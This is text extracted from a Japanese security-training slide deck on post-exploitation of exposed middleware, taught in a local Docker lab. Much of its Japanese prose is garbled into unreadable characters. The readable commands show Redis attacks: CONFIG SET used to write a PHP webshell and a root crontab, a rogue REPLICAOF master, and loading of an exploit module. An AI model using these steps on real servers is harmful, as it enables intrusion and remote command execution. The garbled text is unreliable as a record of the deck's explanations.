ηΩϡϦςΟɾΩϟϯϓશࠃେձ2020ΦϯϥΠϯ
Learn the essential way of thinking about vulnerabilities
through post-exploitation on middlewares
Teppei Fukuda (@knqyf263)
Taichi Kotake (@tkmru)
ຊͷྲྀΕ
w ͳͥ1PTU&YQMPJUBUJPOΛֶͿͷ͔ʁ
w ϛυϧΣΞͷϩάΠϯޙʹԿ͕ग़དྷΔ͔ʁ
w .Z42-ฤ
w 1PTUHSF42-ฤʢϋϯζΦϯʣ
w 3FEJTฤʢϋϯζΦϯʣ
w %PDLFSฤ
w ԋश
Slide 4
Slide 4 text
ࣗݾհ
w ໊લɿ5FQQFJ'VLVEB !LORZG
w ॴଐɿ"RVB4FDVSJUZ4PGUXBSF-UE
0QFO4PVSDF5FBN
0QFO4PVSDF&OHJOFFS
w ॴࡏɿ5FM"WJW
*TSBFM
Slide 5
Slide 5 text
ࣗݾհ
w ໊લɿ5BJDIJ,PUBLF !ULNSV
w ॴଐɿגࣜձࣾΞΧπΩ
ɹɹɹηΩϡϦςΟΤϯδχΞ
w ॴࡏɿ౦ژ
w ஶॻ
w 8%#13&447PM
ಛूπʔϧͰ؆୯ʂ͡Ίͯͷ੬ऑੑௐࠪʢٕज़ධࣾʣ
w ϦόʔεΤϯδχΞϦϯάπʔϧ(IJESB࣮ફΨΠυʢϚΠφϏग़൛ʣ
Slide 6
Slide 6 text
ͳͥ1PTU&YQMPJUBUJPOΛֶͿͷ͔ʁ
Slide 7
Slide 7 text
1PTU&YQMPJUBUJPOͱ
w $BSMPT1FSF[ .FUBTQMPJU։ൃνʔϜʣ
w 4IFMMJT0OMZUIF#FHJOOJOHʮγΣϧ࢝·Γʹա͗ͳ͍ʯ
w &YQMPJUΛޭͤͨ͋͞ͱͷߦಈ
w ৵ೖ͔ͯ͠ΒԿΛ͢Δͷ͔ʁ͕ॏཁ
w ྫ
w ݖݶঢ֨
w ύεϫʔυɾϋογϡͷऔಘ
w ΩʔϩΨʔ
w ύέοτεχοϑΝʔ
w FUD
։ൃڥͷμϛʔσʔλ͕
౪·Ε͚ͨͩʁ
01
S T E P
02
S T E P
03
S T E P
04
S T E P
05
S T E P
։ൃαʔόͷroot
औΒΕͨʁ
ຊ൪αʔόʹ
৵ೖ͞Εͨʁ
Active Directoryʹ
৵ೖ͞Εͨʁ
DB͔ΒݸਓใΛ
౪·Εͨʁ
৵ೖɾ৵ൣғͷѲॏཁ
Slide 13
Slide 13 text
01
S T E P
02
S T E P
03
S T E P
04
S T E P
05
S T E P
৵ೖޙͷ߈ܸํ๏ΛֶΜͰ͓͘
ΠϯύΫτ͕શ͘ҟͳΔ
μϛʔσʔλ ݸਓใ
ैۀһใ
৵ೖޙʹԿ͕ग़དྷͨͷ͔ʁΛ͓ͬͯ͘
Slide 14
Slide 14 text
ݱ࣮ੈքͷ
Slide 15
Slide 15 text
No content
Slide 16
Slide 16 text
No content
Slide 17
Slide 17 text
શͯͷهࣄ
ࠓϗοτͳ
Slide 18
Slide 18 text
ϛυϧΣΞͷޡͬͨެ։
w ઃఆϛε͍ηΩϡϦςΟҙࣝʹΑΓϛυϧΣΞΛΠϯλʔωοτ্ʹ
ೝূແ͠ͰʢԾʹ͋ͬͯऑ͍ೝূͰʣެ։ͯ͠͠·͏ࣄྫඇৗʹଟ͍
w 3FEJT
w &MBTUJDTFBSDI
w %PDLFS"1*
w .Z42-
w 1PTUHSF42-
w FUD
߈ܸऀϩάΠϯ͠์
Slide 19
Slide 19 text
*OUFSOFU
S
1SJWBUF/FUXPSL
*OUFSOFU
S
1VCMJD/FUXPSL
Slide 20
Slide 20 text
%#αʔόʹϩάΠϯ͢Δํ๏
ίϚϯυྫ
w .Z42-
w NZTRMVSPPUIJQΞυϨε
w 1PTUHSFT%#
w QTRM6QPTUHSFTIJQΞυϨε
w 3FEJT
w SFEJTDMJIJQΞυϨε
Slide 21
Slide 21 text
%#αʔόͷϒϧʔτϑΥʔε
/4&ʢ/NBQ4DSJQUJOH&OHJOFʣ
w ೝূ͕͔͔͍ͬͯͨ߹Ͱऑ͍ͷͳΒ؆୯ʹಥഁՄೳ
w /NBQʹଐ͍ͯ͠ΔεΫϦϓτͰϒϧʔτϑΥʔε߈ܸͰ͖Δ
w /NBQʹεΫϦϓτΤϯδϯʢ/4&ʣ͕ࡌ͞Ε͍ͯΔ
w ྫONBQWQTDSJQUNZTRMCSVUFJQΞυϨε
w ߈ܸऀ؆୯ʹ߈ܸͰ͖Δ
Slide 22
Slide 22 text
ϩάΠϯग़དྷͨʂऴΘΓʁ
"Middleware Exploitation is Only the Beginning"
5FQQFJ'VLVEB
w 3FEJTʹ,FZ7BMVFΛϑΝΠϧͱͯ͠ॻ͖ग़͢ػೳ͕͋Γɺॻ͖ग़͠ઌ
3FEJTίϚϯυͰมߋՄೳ
w ҙͷॴʹσʔλΛॻ͖ग़͢͜ͱ͕ग़དྷΔ
CONFIG SETΛ༻͍ͨํ๏
$ redis-cli
127.0.0.1:6379> config get dir
1) "dir"
2) "/data"
127.0.0.1:6379> config get dbfilename
1) "dbfilename"
2) "dump.rdb"
Slide 30
Slide 30 text
σʔλΛdumpͯ͠ΈΔ
$ docker run -d --name redis -p 127.0.0.1:6379:6379 redis:5.0
$ docker exec -it redis bash
root@824e916202fd:/data# redis-cli
127.0.0.1:6379> set foo bar
OK
127.0.0.1:6379> save
OK
$ 127.0.0.1:6379> exit
root@824e916202fd:/data# cat dump.rdb
REDIS0009 redis-ver5.0.10
redis-bits@ctimeused-mem
aof-preamblefoobarb_ γϦΞϥΠζ͞Ε͍ͯΔ͕
อଘͨ͠GPPCBS͕
ೖ͍ͬͯΔ͜ͱ͕֬ೝͰ͖Δ
Slide 31
Slide 31 text
w ߨٛ༻ͷΠϝʔδΛىಈ͠ɺSFEJTDMJͰϩάΠϯ͠·͢
w ·ͨɺϒϥβͰIUUQMPDBMIPTUΛ։͍ͯQIQJOGP͕ݟ͑Δ͜ͱΛ
֬ೝͯ͠Լ͍͞
࣮ࡍʹͬͯΈΔʢWebshellʣ
$ docker rm -f redis
$ docker run -d --name redis -p 127.0.0.1:10080:80 -p
127.0.0.1:6379:6379 knqyf263/redis-configset-webshell
$ redis-cli
127.0.0.1:6379> ping
PONG
Slide 32
Slide 32 text
w QIQJOGPʹΑΓVTSTIBSFOHJOYIUNM͕υΩϡϝϯτϧʔτͱ͔ͬͨͷͰɺ
DPOpHTFUEJSͰࢦఆ
w %#ͷμϯϓͳͷͰΰϛ͕ೖΔ͕ɺ QIQ Ͱғͬͨͱ͜Ζ͕1)1ͱͯ͠ೝࣝ͞
ΕΔͷͰલޙͷΰϛͳ͍
PHPͷϑΝΠϧΛॻ͖ࠐΉʢWebshellʣ
127.0.0.1:6379> config set dir /usr/share/nginx/html
OK
127.0.0.1:6379> config set dbfilename redis.php
OK
127.0.0.1:6379> set test ''
OK
127.0.0.1:6379> save
OK
127.0.0.1:6379> exit
Slide 33
Slide 33 text
w IUUQMPDBMIPTUSFEJTQIQ DNEJEͳͲͰίϚϯυ͕࣮ߦ͞ΕΔ͜ͱΛ֬ೝ
w IUUQMPDBMIPTUSFEJTQIQ DNEUPVDICBSͳͲͰϑΝΠϧ࡞Ͱ͖Δ
w ࣮ࡍʹίϯςφʹϩάΠϯͯ͠ϑΝΠϧ͕࡞͞Ε͍ͯΔ͜ͱΛ֬ೝ͢Δ
֬ೝʢWebshellʣ
$ docker exec -it redis bash
root@6b3e28756441:/data# ls /usr/share/nginx/html/
bar index.html index.php redis.php
root@6b3e28756441:/data# cat /usr/share/nginx/html/
redis.php
REDIS0009 redis-ver5.0.10
redis-bits@ctimeused-mem
aof-preambletest'
ΰϛ͕ೖ͍ͬͯΔ͕
QIQ ਖ਼͘͠
ॻ͖ࠐ·Ε͍ͯΔ
w ࠓճWBSTQPPMDSPOSPPUʹॻ͖ࠐΉ
w ˞ҰൠϢʔβͩͱ௨ৗ্هͷσΟϨΫτϦʹॻ͖ࠐΈݖݶ͕ͳ͍
w ΰϛ͕ೖΔ͕ɺߦ୯ҐͰͷղऍͳͷͰվߦ͓͚ͯ͠ͳ͘ಈ࡞
cronͷઃఆΛॻ͖ࠐΉ
127.0.0.1:6379> config set dir /var/spool/cron/
OK
127.0.0.1:6379> config set dbfilename root
OK
127.0.0.1:6379> set payload "\n*/1 * * * * /bin/touch /tmp/foo\n"
OK
127.0.0.1:6379> save
OK
127.0.0.1:6379> exit
$ telnet localhost 6379
SYNC
...
*2
$6
SELECT
$1
0
*3
$3
set
$3
foo
$3
bar
$ redis-cli
127.0.0.1:6379> set foo bar
OK
%#Λબ
4&-&$5
LFZWBMVFΛอଘ
TFUGPPCBS
͜ΕΒͷίϚϯυ3FQMJDBͰ୯ʹ࣮ߦ͞ΕΔ
Slide 52
Slide 52 text
3&1-*$"0'ͷѱ༻
7JDUJN
3FQMJDB
"UUBDLFS
w 3&1-*$"0'Λ͑௨ৗͷ3FEJTΠϯελϯεΛڧҾʹ3FQMJDBʹઃఆՄೳ
w .BTUFSΛ"UUBDLFSͷϚγϯʹ͓͚ͯ͠4:/$͕3FQMJDB͔ΒඈΜͰ͘Δ
3&1-*$"0'Ͱ"UUBDLFSΛ
.BTUFSʹઃఆ͢Δ
4:/$14:/$
Slide 53
Slide 53 text
3FQMJDBʹҙͷ3FEJTίϚϯυΛൃߦՄೳ
3%#ϑΝΠϧ
ҙͷίϚϯυΛྲྀ͠ࠐΉ
w .BTUFSʹͳΓ͢·ͯ͠ҙͷίϚϯυΛసૹ͢Δͱ3FQMJDBͰ࣮ߦ͞ΕΔ
3&1-*$"0'Ͱ"UUBDLFSΛ
.BTUFSʹઃఆ͢Δ
4:/$14:/$
"UUBDLFS 3FQMJDB
Slide 54
Slide 54 text
3FQMJDBʹҙͷ3FEJTίϚϯυΛൃߦՄೳ
3FEJT
"UUBDLFS
w 443'ͳͲͰϨεϙϯε͕ड͚औΕͳ͍ঢ়گͰ༗ޮ
w Πϯλʔωοτʹ3FEJTΛࡽ͍ͯ͠ͳͯ͘͞Δ
੬ऑͳ8FCαʔό
ࣾ
3FRVFTU
3&1-*$"0'
4:/$
Slide 55
Slide 55 text
3FQMJDBʹҙͷ3FEJTίϚϯυΛൃߦՄೳ
w ࣮ࡍʹϨεϙϯεΛड͚औΔͨΊʹ͏গ͕͠ඞཁ
w ຊߨٛͰΠϯλʔωοτ্ʹެ։͞Εͯ͠·ͬͨ3FEJTͳͲɺ3FEJTʹೖΕΔલ
ఏͰਐΊΔͨΊݩ͔Βҙͷ3FEJTίϚϯυ͕࣮ߦՄೳͰϨεϙϯεड͚औΕΔఆ
IUUQT[FSPOJHIUTSVXQDPOUFOUVQMPBETNBUFSJBMTSFEJTQPTUFYQMPJUBUJPOQEG
3FEJT
"UUBDLFS
ҙͷ3FEJTίϚϯυ
ϋϯζΦϯڥ
w 3FEJT͔ΒͷଓΛड͚Δඞཁ͕͋ΔͷͰEPDLFSDPNQPTFͰࢼ͢
w SPHVFͱSFEJTͷͭͷίϯςφ͕ىಈ͍ͯ͠Δ
w جຊతʹSPHVFʹϩάΠϯͯ͠࡞ۀ͢Δ
SPHVF SFEJT
EPDLFSDPNQPTF
SFEJTDMJ
EPDLFSDPNQPTFFYFD
߈ܸ༻ڥ ΒΕ3FEJT
Slide 61
Slide 61 text
$ cd [͖ͳdir]
$ wget https://gist.githubusercontent.com/
knqyf263/16232934bd772ee9f8c76f4a10447aa2/raw/
fa6638ca34f279b1d5f06d1ddf2f83079589fe5b/docker-compose.yml
$ docker-compose up -d
$ docker-compose exec rogue bash
ڥͷىಈ
w ͖ͳσΟϨΫτϦʹҠಈͯ͠EPDLFSDPNQPTFZNMΛμϯϩʔυ͢Δ
w EPDLFSDPNQPTFΛىಈͯ͠FYFDͰSPHVFʹϩάΠϯ͢Δ
ϋϯζΦϯதʹίϯςφ͕ࢮΜͩΒ
EPDLFSDPNQPTFEPXOEPDLFSDPNQPTFVQE͢Δ
ʢෆਖ਼ͳ3%#ϑΝΠϧͰΫϥογϡ͢Δ͜ͱ͕͋Δʣ
Slide 62
Slide 62 text
REPLICAOFͷઃఆ
w SFEJTʹରͯ͠SPHVF͔ΒSFEJTDMJͰϩάΠϯ͢Δ
w 3&1-*$"0'ίϚϯυΛͬͯSPHVFͷ൪ϙʔτΛNBTUFSʹࢦఆ
w EPDLFSDPNQPTF͓͔͛ͰSPHVFͰ໊લղܾͰ͖Δ
SPHVF SFEJT
EPDLFSDPNQPTF
3&1-*$"0'SPHVF
SFQMJDBͱͯ͠
NBTUFS SPHVF
ʹܨ͗ʹདྷΔ
root@b6d0575dafc4:/rogue# redis-cli -h redis replicaof rogue 10000
Slide 63
Slide 63 text
NetcatίϚϯυ
w ؆қͳΫϥΠΞϯτɺαʔόͷϓϩηεΛىಈ͢ΔίϚϯυ
w Φϓγϣϯ
w MMJTUFONPEF
GPSJOCPVOEDPOOFDUT
w QQPSUMPDBMQPSUOVNCFS
w LTFULFFQBMJWFPQUJPOPOTPDLFU
root@b6d0575dafc4:/rogue# nc -klp 10000
*1
$4
PING
3FQMJDB͔Β1*/(͕
ඈΜͰ͖͍ͯΔ
IUUQTMJOVYEJFOFUNBOOD
PSYNC
w ಉظΛ్த͔Β࠶։͢ΔͨΊͷίϚϯυ
w .BTUFSP⒎TFU͚ͩͣΒ͚ͯࠩͩ͠ฦ͢
w 14:/$SFQMJDBUJPOJEP⒎TFU
w SFQMJDBUJPOJEจࣈ
w 14:/$EEFDFDGGFCCGDFCG
w ॳճͷ߹14:/$ͱ͔14:/$ ͱ͔ʹͳΔ
*3
$5
PSYNC
$40
d3d15637ec5ecf9f593ebb5f7345c3e2b2f52689
$1
1
Slide 72
Slide 72 text
PSYNCʹର͢Δ߈ܸʢ1/2ʣ
w 14:/$ʹ"$,Λฦ͢ͱ4:/$͕ඈΜͰ͘ΔͷͰϖΠϩʔυΛૹΔʢࠩѻ͍ʣ
w ॳճͳΒ3%#ϑΝΠϧۭͳͷͰ͜ΕͰҙͷϑΝΠϧΛॻ͖ࠐΊΔ
SPHVF SFEJT
14:/$
0,
4:/$
ҙͷσʔλ
ݱঢ়·ͱΊʢ3FEJT3&1-*$"0'ฤʣ
w ߈ܸରͷ3FEJTʹର͠߈ܸऀҙͷ3FEJTίϚϯυΛൃߦՄೳ
w 3&1-*$"0'ΛͬͯରαʔόΛ3FQMJDBʹઃఆ
w ಉ࣌ʹ߈ܸऀαʔόΛ.BTUFSʹઃఆ
w 4:/$14:/$Λ3FQMJDB͔Βൃߦͤ͞ҙͷϖΠϩʔυΛฦ͠EVNQSECʹ
͖ͳσʔλΛॻ͖ࠐΉ
·ͩ04ͷγΣϧ͕औΕ͍ͯͳ͍ʂʂ
Slide 78
Slide 78 text
ҙͷϑΝΠϧॻ͖ࠐΈՄೳ
3FEJT.PEVMFT
Slide 79
Slide 79 text
3FEJT.PEVMFT
w ࣗ࡞ͷίϚϯυΛఆٛͰ͖Δ
w .0%6-&-0"%ͰϞδϡʔϧΛϩʔυՄೳ
04ίϚϯυΛ࣮ߦ͢ΔϞδϡʔϧΛ࡞Εྑ͍
Slide 80
Slide 80 text
3FEJT.PEVMF GSPN.FUBTQMPJU
w ߦҎͰ؆୯ʹॻ͚Δ
w ࠓճͷߨٛͰ.FUBTQMPJUͷίʔυΛྲྀ༻
w ษڧͷͨΊʹࣗ࡞ͯ͠Έͯྑ͍
IUUQTHJUIVCDPNSBQJENFUBTQMPJUGSBNFXPSLCMPCBDFEDEGFDGFECBEGEEBUBFYQMPJUTSFEJTFYQFYQD
3FEJT.PEVMFΛྲྀ͠ࠐΉ
w Ұ៉ྷʹͯ͠Γ͢
w ϞδϡʔϧطʹSPHVFίϯςφʹஔࡁΈʢFYQTPʣ
root@b6d0575dafc4:/rogue# exit
$ docker-compose down
$ docker-compose up -d
$ docker-compose exec rogue bash
root@d99f653690ed:/rogue# cd /data/redis-rogue-server/
root@d99f653690ed:/data/redis-rogue-server# ls exp.so
exp.so
%PDLFSίϯςφ͔ΒͷFTDBQF
w QSJWJMFHFEΛ͚͍ͭͯΔ߹
w EFWΛ͏ํ๏
w OPUJpDBUJPOPOSFMFBTFΛ͏ํ๏
w EPDLFSͷ੬ऑͳόʔδϣϯΛ͍ͬͯΔ߹
w Χʔωϧͷ੬ऑͳόʔδϣϯΛ͍ͬͯΔ߹
ղઆ͢Δ࣌ؒͳ͔ͬͨͷͰࢿྉࢀর
IUUQTJCMBDLIBUDPN64"5IVSTEBZVT&EXBSET$PNQFOEJVN0G$POUBJOFS&TDBQFTVQQEG
Slide 92
Slide 92 text
·ͱΊ
w ৵ൣғΛѲ͢ΔͨΊʹ߈ܸऀ͕৵ೖޙʹग़དྷΔ͜ͱΛѲ͢Δඞཁ͕͋Δ
w 1PTU&YQMPJUBUJPOΛֶͿ͜ͱͦͷॿ͚ͱͳΔ
w ۩ମྫͱͯ͠ϛυϧΣΞ৵ೖޙʹ04ίϚϯυ͕࣮ߦՄೳʹͳΔ߹͋Δ
w .Z42-
1PTUHSF42-
3FEJT
%PDLFS
FUD
w ࣮ࡍʹखΛಈ͔ͯ͠ཪଆ·Ͱཧղ͢Δ͜ͱ͕ॏཁ
ఁ
ثԽ
ૹ
߈ܸ
Πϯετʔϧ
৵ೖ֦େ
తୡ
ϛυϧΣΞʹ৵ೖ Կ͕Մೳ͔ʁ